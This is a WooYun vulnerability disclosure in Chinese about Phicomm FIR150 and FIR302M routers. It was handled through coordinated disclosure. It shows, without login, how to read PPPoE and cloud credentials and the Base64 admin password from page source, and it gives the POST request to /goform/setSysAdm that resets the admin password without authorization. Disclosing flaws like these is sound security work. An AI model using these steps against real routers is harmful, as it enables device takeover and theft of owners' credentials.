当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-082522

漏洞标题:斐讯路由器漏洞集合(直接获取管理密码,未授权获取pppoe账号等)

相关厂商:斐讯路由器

漏洞作者: Pany自留地

提交时间:2014-11-12 10:36

修复时间:2015-02-10 10:38

公开时间:2015-02-10 10:38

漏洞类型:权限控制绕过

危害等级:中

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-11-12: 细节已通知厂商并且等待厂商处理中
2014-11-14: 厂商已经确认,细节仅向厂商公开
2014-11-17: 细节向第三方安全合作伙伴开放
2015-01-08: 细节向核心白帽子及相关领域专家公开
2015-01-18: 细节向普通白帽子公开
2015-01-28: 细节向实习白帽子公开
2015-02-10: 细节向公众公开

简要描述:

测试型号:
FIR150
FIR302M
其他型号暂时不清楚,不过应该同样有这些情况。
测试的时候,都不是在登录状态下!

详细说明:

震惊的是所有存储的隐私信息(包括斐讯的云账号),都保存在js里或者源码里,仅简单采用Base64编码。

测试的时候,都不是在登录状态下!


FIR302M: 软件版本 V1.0.34(官网最新的版本)
FIR150 : 软件版本 V1.0.25
1、首先是未授权获取pppoe账号:
直接访问192.168.1.1/wan_dhcp.asp 会跳转到登录界面,但是如果我们直接查看源码或者禁用JS呢。

view-source:http://192.168.1.1/wan_dhcp.asp
源码的第101-102行 
document.wanCfg.pppoeUser.value="7***0903***";
document.wanCfg.pppoePass.value="2j****3r";


2.png


测试型号:
FIR150 -漏洞存在
FIR302M -漏洞存在
2、未授权直接获取斐逊的云账号。
这个FIR150和和FIR302M有所出入。
FIR302M下:
FIR302M直接访问http://192.168.1.1/cloudRegist.asp 查看源码。

第14行,包括了账号。
var cloud_email = "*****@qq.com";


33.png


第62行-64行,包括了密码。

12.jpg


FIR150下:
FIR150直接访问http://192.168.1.1/quick_setup1.asp查看源码。
第477行-479行,包括了密码。

222.png


3、未授权修改管理员账号密码。
POST http://192.168.1.1/goform/setSysAdm

admuser=admin&admpass=(base64编码后的密码)&admpass2nd=admpass=(base64编码后的密码)


asda.png


测试型号:
FIR150 -漏洞存在
FIR302M -漏洞存在
4、最暴力的来袭(可以无视上面这些漏洞了)-直接获取管理密码
管理密码直接保存在了JS里面。

mask 区域 
*****s/forbi*****


第197-198行,账号和密码都躺在了里面。
var m_username="admin";
var m_password="****4Nw==";


22a.png


测试型号:
FIR150 -漏洞存在
FIR302M -漏洞存在

psb.jpg


漏洞证明:

首先是未授权获取pppoe账号:

2.png


未授权修改管理员账号密码

asda.png


直接获取管理密码

22a.png

修复方案:

所有存储的隐私信息(包括斐讯的云账号),都保存在js里或者源码里,仅简单采用Base64编码,
都能直接访问,单单信任JS验证是万万不可取的,请在考虑路由器性能的同时注重路由器安全方面。(特别是其中的云账号和密码)

版权声明:转载请注明来源 Pany自留地@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2014-11-14 17:45

厂商回复:

最新状态:

暂无